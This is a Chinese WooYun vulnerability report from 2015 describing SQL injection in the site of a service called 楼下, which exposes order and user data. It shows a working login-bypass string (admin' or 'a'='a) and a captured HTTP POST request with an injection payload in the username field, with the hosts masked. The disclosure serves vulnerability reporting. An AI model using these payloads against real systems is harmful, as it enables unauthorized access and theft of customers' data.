当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164616

漏洞标题:楼下网站存在SQL注入导致订单用户信息泄露

相关厂商:楼下

漏洞作者: 0x_79

提交时间:2015-12-27 18:18

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-27: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

RT

详细说明:

官网 **.**.**.** 过滤不严禁多处SQL注入漏洞,对楼下APP还是比较赞,服务态度非常好!
后台地址

http://**.**.**.**/login.aspx


使用万能密码即可登录
账户:admin' or 'a'='a
密码a

漏洞证明:

1.PNG


订单数据

2.PNG


后台注入漏洞

POST /app/tongji/userTongji.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/app/tongji/userTongji.aspx
Content-Length: 1791
Cookie: username=tmpname=CD934BD7C93D6F65B1D63344C51D38D10C01D3BBE11F370E328A7CEB50DB79B67FEB3503F010699FDB5674291C0B00F5160AF0A0615C721B3F279493FDFE490B4C8B798C32E7CBEBBF1EBA77076CFB08354C1FF145A7E08B9B0F3560F14D463130824B4F324507E1DCB1F93460FC2993225145DA04B2AAE1AE5DE618E07C0C5382511FFB42DD9B995073EF5614C5F435D79F83C45AD41C026DA82EE63A30D4292D5CEC8EC58271B0F487FA5CD430FF3D8E498D22B53D1F8156D476361874E4EE5AF4D1C36C15EFAF8C18DA7B262F93E3045F091647306A1FDEBD1B5308D30FD02BA50DD5DACDDC740866C05E2B736B173458C9EF50A963CEEECF750683F96B01B99A5276F101429DDE981CDEAEB9D8E356E6A1FE9E8F960133F13BE6F5C20789107522F5E939E1450ED50E27AF70F525D158EDE87DC8D4C2EC6902B5D792DE5C7531770BA0DC75DF3149F365324582288BC3F546024FF4B145546B5A6AA918CB; xiaoquname=%25E9%2587%2591%25E9%25B9%258F%25E8%25A1%2597176%25E5%258F%25B7%25E9%2599%25A2; xiaoqucode=555456662; ASP.NET_SessionId=mrlz2kaeej2qvs554oqbc53d
X-Forwarded-For: **.**.**.**'
Connection: keep-alive
__EVENTTARGET=pnlWraq%24Panel6%24Panel3%24Button1&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEzMTM2NjAxNTFkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYQBQdwbmxXcmFxBQ5wbmxXcmFxJFBhbmVsNgUVcG5sV3JhcSRQYW5lbDYkUGFuZWwyBSJwbmxXcmFxJFBhbmVsNiRQYW5lbDIkUmFkaW9CdXR0b24xBSJwbmxXcmFxJFBhbmVsNiRQYW5lbDIkUmFkaW9CdXR0b24yBSJwbmxXcmFxJFBhbmVsNiRQYW5lbDIkUmFkaW9CdXR0b24zBRVwbmxXcmFxJFBhbmVsNiRQYW5lbDEFIXBubFdyYXEkUGFuZWw2JFBhbmVsMSREYXRlUGlja2VyMQUhcG5sV3JhcSRQYW5lbDYkUGFuZWwxJERhdGVQaWNrZXIyBRVwbmxXcmFxJFBhbmVsNiRQYW5lbDMFIXBubFdyYXEkUGFuZWw2JFBhbmVsMyR0eHRVc2VyTmFtZQUfcG5sV3JhcSRQYW5lbDYkUGFuZWwzJHR4dE1vYmlsZQUdcG5sV3JhcSRQYW5lbDYkUGFuZWwzJEJ1dHRvbjEFHXBubFdyYXEkUGFuZWw2JFBhbmVsMyRCdXR0b24yBRBwbmxXcmFxJEdyaWRMaXN0BQdXaW5kb3cxBRBwbmxXcmFxJEdyaWRMaXN0Dw9kZWRSJmaBYtY6Ae7Wi6KpZ80rK%2FGy0Q%3D%3D&pnlWraq%24Panel6%24Panel1%24DatePicker1=&pnlWraq%24Panel6%24Panel1%24DatePicker2=&pnlWraq%24Panel6%24Panel3%24txtUserName=1&pnlWraq%24Panel6%24Panel3%24txtMobile=&F_CHANGED=true&Window1_Hidden=true&F_TARGET=pnlWraq_Panel6_Panel3_Button1&pnlWraq_Panel6_Panel2_RadioButton1_Checked=false&pnlWraq_Panel6_Panel2_RadioButton2_Checked=false&pnlWraq_Panel6_Panel2_RadioButton3_Checked=false&pnlWraq_Panel6_Panel2_Collapsed=false&pnlWraq_Panel6_Panel1_Collapsed=false&pnlWraq_Panel6_Panel3_Collapsed=false&pnlWraq_Panel6_Collapsed=false&pnlWraq_GridList_Collapsed=false&pnlWraq_GridList_SelectedRowIndexArray=&pnlWraq_Collapsed=false&Window1_Collapsed=false&F_STATE=eyJwbmxXcmFxX1BhbmVsNl9QYW5lbDNfdHh0VXNlck5hbWUiOnsiVGV4dCI6ImFuZCBzZWxlY3QgQEB2ZXJzaW9uKCkifSwicG5sV3JhcV9QYW5lbDZfUGFuZWwzX3R4dE1vYmlsZSI6eyJUZXh0IjoiMTg4MDA5NTQyMzQifSwicG5sV3JhcV9HcmlkTGlzdCI6eyJGX1Jvd3MiOnsiVmFsdWVzIjpbXSwiRGF0YUtleXMiOltdLCJTdGF0ZXMiOltdfSwiUmVjb3JkQ291bnQiOjAsIlNlbGVjdGVkUm93SW5kZXhBcnJheSI6W119fQ%3D%3D&F_AJAX=true


pnlWraq$Panel6$Panel3$txtUserName参数未过滤,POST注入

3.PNG


表证明

4.PNG

修复方案:

过滤...

版权声明:转载请注明来源 0x_79@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-12-31 19:04

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无